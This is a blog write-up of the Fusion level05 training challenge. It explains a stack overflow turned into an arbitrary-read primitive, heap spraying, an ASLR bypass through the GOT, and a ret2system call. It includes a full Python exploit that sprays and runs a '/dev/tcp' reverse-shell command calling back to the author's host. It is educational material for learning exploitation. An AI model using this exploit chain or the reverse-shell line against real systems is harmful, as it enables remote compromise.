exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues. The exercise talked about in this blog post can be found here:
https://exploit-exercises.com/fusion/level05/
I am writing this blog post because I saw no solution similar to mine over the internet. Hopefully exposing my method and techniques, I will be able to enrich others knowledge and methodology.
The Problem
In this exercise we are facing a web server compiled with several protection mechanisms, also we are expecting the vulnerability to be stack based.
To bypass these protections mechanisms and obtain some kind of shell, we’ll have to:
- Find an information leak in order to bypass the different ASLR protections
- Obtain some write capabilities for something to execute, either a shellcode or a string
- Execution capabilities
Intro
The method I used to solve this exercise will cover the concept of heap spraying and stack overflowing both for controlling the EIP
and for changing only the stack variables which will change the behavior of the program for out benefit. Changing only the saved stack variables will provide the ability to read (almost) any address. With that in mind, let’s dive in.
The code begins with the server listening on port 20005, and an internal task creation mechanism – creating a childtask()
for new connection received. It is important to mention that unlike previous exercises, the code in the main()
function doesn’t fork()
, therefore if we crash the program it’s a “game over”, we won’t be able to communicate with the server anymore and we will have to restart the program. The side effect of restarting the program, is the randomization of the addresses will happen again, thus we have to find an information leak without crashing the program. An information leak is the idea of finding some kind of information disclosure that will help us bypass the ASLR
protection.
The real logic begins with function childtask()
, where you have 5 known commands you can send to the application: “addreg”, “senddb”, “checkname”, “quit” and “isup”.
The only functions i will use for the exploit are checkname()
and isup()
.
Obtaining Read Capabilities
Let’s observe the function checkname()
static void checkname(void *arg) { struct isuparg *isa = (struct isuparg *)(arg); int h; h = get_and_hash(32, isa->string, '@'); fdprintf(isa->fd, "%s is %sindexed already\n", isa->string, registrations[h].ipv4 ? "" : "not "); }
And the called function as well get_and_hash()
int get_and_hash(int maxsz, char *string, char separator) { char name[32]; int i; if(maxsz > 32) return 0; for(i = 0; i < maxsz, string[i]; i++) { if(string[i] == separator) break; name[i] = string[i]; } return hash(name, strlen(name), 0x7f); }
Under the function get_and_hash()
, it appears the author implemented his own kind of strcpy()
, which will stop copying either on a null termination, or when the string has the separator value inside of it, which is @
– 0x40
. It has no actual string length limitation, and this is where the magic begins.
We can essentially send a string of (almost) 512 bytes in the childtask()
function, this function will pass a duplicated string to checkname()
, and it will pass it forward to get_and_hash()
where the buffer overflow occurs. Let’s examine the get_and_hash()
prologue and epilogue to better understand the overflow benefits and possible effects.
Notice the registers ESI
, EDI
and EBP
. When we overflow the stack, we first fill the data saved for the buffer char name[32];
but after that saved buffer, there are also the three registers that pushed on the stack in the Prologue that we can overflow as well. They are restored in the Epilogue of the function with any new data I provide (After the overflow occurred). Let’s see if these saved values can benefit us somehow in the calling function checkname()
. Here is an assembly screenshot of how it looks like, with additional comments of mine:
Let’s see if the registers we can override ESI
, EDI
and EBP
have any meaning in this function.
It seems like EDI
is expected to have the string, and ESI
the file descriptor (FD). This is great, a pseudo call to the fdprintf()
function would look like that:
fdprintf(ESI, “%s is %sindexed already\n”, EDI, registrations[h].ipv4 ? “” : “not “);
After a short dynamic examination, I noticed that the file descriptor always had the same value of 4
and regarding the string, if I can manage to provide any readable address, it will be printed. I can theoretically repeat this function for all of the memory, I will be able to find the address of libc
and then the address of system()
which will easily help me execute any command and a little spoiler: later on my reverse shell. Basically right now I almost have the ability to read any address, however providing an invalid address to the fdprintf()
function will cause the program to crash. I don’t know any valid existing address, so what should I do?
Heap Spray
In order to obtain a valid address to read from, we will have to create it. I noticed the addresses are more or less the same every time I restarted the program:
Start Addr End Addr Size Offset objfile 0xb755f000 0xb75a1000 0x42000 0 0xb75a1000 0xb7717000 0x176000 0 /lib/i386-linux-gnu/libc-2.13.so 0xb7717000 0xb7719000 0x2000 0x176000 /lib/i386-linux-gnu/libc-2.13.so 0xb7719000 0xb771a000 0x1000 0x178000 /lib/i386-linux-gnu/libc-2.13.so 0xb771a000 0xb771d000 0x3000 0 0xb7727000 0xb7729000 0x2000 0 0xb7729000 0xb772a000 0x1000 0 [vdso] 0xb772a000 0xb7748000 0x1e000 0 /lib/i386-linux-gnu/ld-2.13.so 0xb7748000 0xb7749000 0x1000 0x1d000 /lib/i386-linux-gnu/ld-2.13.so 0xb7749000 0xb774a000 0x1000 0x1e000 /lib/i386-linux-gnu/ld-2.13.so 0xb774a000 0xb7750000 0x6000 0 /opt/fusion/bin/level05 0xb7750000 0xb7751000 0x1000 0x6000 /opt/fusion/bin/level05 0xb7751000 0xb7754000 0x3000 0 0xb8977000 0xb8998000 0x21000 0 [heap] 0xbff36000 0xbff57000 0x21000 0 [stack]
The first byte of the lowest address loaded library is always around 0xB6000000
to 0xB9000000
, including the beginning of the heap, the heap also begins somewhere between the last loaded library and the stack. The maximum available address that anything can be at has to be lower than 0xC0000000
, therefore, if I can allocate enough data on the heap, increasing its size, I can safely guess an address that will surely be readable. any address between 0xbd00000 to 0xbe000000 will surely be mine if I allocate & write enough data on the heap. So how can I do that?
Examine the call to the function isup()
:
if(strncmp(buffer, "isup ", 5) == 0) { struct isuparg *isa = calloc(sizeof(struct isuparg), 1); isa->fd = cfd; isa->string = strdup(buffer + 5); taskcreate(isup, isa, STACK); }
There is a call to strdup()
which duplicated a string on the memory:
DESCRIPTION
The strdup() function returns a pointer to a new string which is a duplicate of the string s. Memory for the new string is obtained with malloc(3), and can be freed with free(3).
but there is no subsequent call to free()
which means the buffer is never freed from the heap, if we call the strdup()
plenty of times (more specifically around 0x20000 times) with a long string we can essentially predict an address on the heap which will contain our provided data.
Start Addr End Addr Size Offset objfile 0xb755f000 0xb75a1000 0x42000 0 0xb75a1000 0xb7717000 0x176000 0 /lib/i386-linux-gnu/libc-2.13.so 0xb7717000 0xb7719000 0x2000 0x176000 /lib/i386-linux-gnu/libc-2.13.so 0xb7719000 0xb771a000 0x1000 0x178000 /lib/i386-linux-gnu/libc-2.13.so 0xb771a000 0xb771d000 0x3000 0 0xb7727000 0xb7729000 0x2000 0 0xb7729000 0xb772a000 0x1000 0 [vdso] 0xb772a000 0xb7748000 0x1e000 0 /lib/i386-linux-gnu/ld-2.13.so 0xb7748000 0xb7749000 0x1000 0x1d000 /lib/i386-linux-gnu/ld-2.13.so 0xb7749000 0xb774a000 0x1000 0x1e000 /lib/i386-linux-gnu/ld-2.13.so 0xb774a000 0xb7750000 0x6000 0 /opt/fusion/bin/level05 0xb7750000 0xb7751000 0x1000 0x6000 /opt/fusion/bin/level05 0xb7751000 0xb7754000 0x3000 0 0xb8977000 0xb8998000 0x21000 0 [heap] 0xb8998000 0xbff2a000 0x7592000 0 [heap] 0xbff36000 0xbff57000 0x21000 0 [stack]
Above you can see an example of the heap post spraying. Notice the new heap created and its size. The string I sprayed includes the file descriptor, which is always 4
, and the string I want to execute for a reverse shell. It is very important to play with the spray for every different string length, because it has to be aligned perfectly for every 0x100
bytes, Which means that for every 0x______XY
possible address, when X and Y are static, the same value will be set on that address (Thanks to the spray).
The next step is to use my read capabilities I explained earlier to read the buffer allocated on the heap, and walk backwards(!) until the buffer is no longer there, which means the point before the spray began. This is done quite easily with a guessed address for my expected string as well as providing an address for the FD. The iteration on the heap would be decreasing the address every run by 0x100
, until we no longer see the expected buffer, this will be the `ground zero`, where the spray began. At this point I have a pointer to the very first allocated string, relatively to that address i found a pointer for the isup()
function probably caused by the taskcreate()
internal mechanism which doesn’t properly free the addresses as well. After reading this address as well, it’s pretty much over and I am on the way to successfully bypassing the ASLR mechanism.
Here is a picture showing the end of the buffer I sprayed, as well as showing the address of the isup()
function, which always resides just next to my buffer.
At this point it becomes quite easy to find the system()
address. using the same technique to read the heap, with the fdprintf()
function we control, just provide the address of the isup()
pointer. From there I have an address of the main binary level05
, I can read any relative address, so a function pointer in the GOT
will just do, for example ‘write’ which is in the libc
library, and from there I can a relatively obtain the address for system()
. In short, it goes like that:
Heap -> isup (level05) -> write (level05) -> write (libc) -> system (libc)
Now when I have the system address, if I can spray a command that will give me a remote shell. I choose to spray the string /bin/sh > /dev/tcp/192.168.164.1/1337 0>&1 2>&1
Where my host IP is 192.168.164.1, and the port I will listen on is 1337. Now I already know how to spray, and I now know I can spray a nice command for a reverse shell. To execute system()
with, I just overflow the checkname()
function further, overriding EBP
which we no longer care about, and providing a new address to return to, which will be system()
, don’t forget to provide the argument we sprayed on the heap as well to obtain the reverse shell.
The code exploiting the level (Written in python):
# Imports import sys import socket import struct import time import binascii # Definitions REMOTE_MACHINE = "192.168.223.128" REMOTE_PORT = 20005 RECV_SIZE = 1024 # Level constants HEAP_FD_ADDRESS = 0xbc111150 START_ADDRESS = 0xBD11b162 BAD_ADDRESS_BYTES = ["00", "0A", "0D", "40"] HEAP_OFFSET_SIZE = 0x100 def connect(): s = socket.socket() s.connect((REMOTE_MACHINE, REMOTE_PORT)) s.settimeout(0.15) return s def spray(): s = connect() spray_text = """A /bin/sh > /dev/tcp/192.168.164.1/1337 0>&1 2>&1; """ + "A" * (0x10 * 3) + struct.pack("I", 0x00000004) print " [*] Begin spray." for i in range(0x1a0000): s.send("isup %s\r\n" % spray_text) # The print is necessary for a REALLY minor delay, otherwise not all s.send requests will be handled (Causing a fail to spray) # It is possible to change it with a short sleep() if the spraying is not as expected print "Spraying : [0x%08X]\r" % (i), def obtain_write_addr(): # Initializations addr = START_ADDRESS bin_addr = addr retrys = 0x10 s = connect() # Welcome message dmsg = s.recv(RECV_SIZE) # retry up to 0x10 times, which is also a page size with the offset we are changing # every time. I know for sure that i will have a "spare" buffer bigger than 0x1000 # to read from without crashing the program, so its fine while 0 < retrys: # Validate address has no bad characters in it tmp = "%08X" % addr for letter in BAD_ADDRESS_BYTES: while letter in [(tmp[i] + tmp[i+1]) for i in range(0,8,2)]: # Debug print #print "\n [*] Bad address: [0x%08X] [%s]\n" % (addr, letter) addr -= HEAP_OFFSET_SIZE tmp = "%08X" % addr continue to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8) to_send += struct.pack("I", HEAP_FD_ADDRESS) # ESI - FD to_send += struct.pack("I", addr) # EDI - Address to_send += "\r\n" s.send(to_send) data = "" try: data = s.recv(1024) #s.recv(100) data = data.replace("\n", "").replace("\r", "") except: # Rare timeout cases handeling time.sleep(0.15) # Debug print print " [*] Current address with [%s...] : [0x%08X] [%s]\r" % (data[:10], addr, binascii.hexlify(data)[:16]), if -1 == data.find("/bin/sh > /dev/tcp/192.168.164.1") and -1 == data.find("A" * 8 + "\x04"): retrys -= 1 # Rare cases where the heap misbehaves by 0x20 bytes, though its working that way addr = addr & 0xFFFFFF00 if 0 == retrys % 2: addr += 0x82 else: addr += 0x62 # Debug prints #print "\n\t retrys: [%d]" % (retrys), #print "%s" % data[:30] else: retrys = 0x10 bin_addr = addr addr -= HEAP_OFFSET_SIZE ############################################################################################################################ # After following all of the heap structure with my spray, im expecting the last one to have a struct at a specific offset # ############################################################################################################################ # Just a pointer to isup isup = ((bin_addr & 0xFFFFFF00) - 0x100 + 0xbc) # Obtain real isup() address to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8) to_send += struct.pack("I", HEAP_FD_ADDRESS) # ESI - FD to_send += struct.pack("I", isup) # EDI - Address to_send += "\r\n" s.send(to_send) data = s.recv(1024) #s.recv(100) # isup() address at level05 isup_hex = binascii.hexlify(data[:4][::-1]) write_addr = int(isup_hex, 16) + 0x41e8 print "\n" print "up(): ", hex(int(isup_hex, 16)) print "write(): ", hex(write_addr) to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8) to_send += struct.pack("I", HEAP_FD_ADDRESS) # ESI - FD to_send += struct.pack("I", write_addr) # EDI - Address to_send += "\r\n" s.send(to_send) data = s.recv(1024) #s.recv(100) # write() address at level05 write_hex = binascii.hexlify(data[:4][::-1]) return int(write_hex, 16) def exec_shell(system_addr): s = connect() to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8) to_send += struct.pack("I", HEAP_FD_ADDRESS) # ESI - FD to_send += struct.pack("I", START_ADDRESS) # EDI - Address to_send += struct.pack("I", 0x01020304) # Ret address to_send += struct.pack("I", system_addr) # EIP to_send += struct.pack("I", START_ADDRESS) to_send += struct.pack("I", START_ADDRESS) to_send += "\r\n" s.send(to_send) def exploit(): write_addr = obtain_write_addr() # Relative offset to system system_addr = write_addr - 0x847a0 exec_shell(system_addr) print "[*] Done." def level05(): try: command = sys.argv[1] except: print "Usage: " print "script <command>" print "Available commands: [spray, run]" print "Use 'spray' perior to 'run'." return if "spray" == command: spray() elif "run" == command: exploit() else: print "Unknown command [%s]" % (command) print "Available commands: [spray, run]" def main(): level05() if "__main__" == __name__: main()
use the script, one with an argument ‘spray’ and one with an argument ‘run’. The script include things which i didn’t go through on this blog, such as bad addresses that you cant provide because of string limitation, and possible weird behavior of the heap. The code explains them and handles these situations. It is also possible to make the exploit cleaner, changing the return address of system()
to some clear exit that will not crash the program.
The exploit could easily be closed, if the program would actually be compiled with a stack cookie protection, canceling the possibility to brute force it without crashing the program. Or if the memory handling would be handled properly with calls to free, including the internal implementation of the tasks which also gave me an information disclosure on the heap.
Thanks for the tutorial! That was really helpful to me
How are you able to hard-code the “HEAP_FD_ADDRESS” value into your script? It changes each time the process is loaded into memory.
It was a couple of years ago, so I hope my memory wont fail me here, but briefly looking at it, after you spray the heap enough times, you can accurately assume where is what in the memory (because you sprayed it).
This is why its a constant, its an educated guess of where the data I want will be after the heap spray.
I didn’t find any other info leak primitives to use to find an exact address differently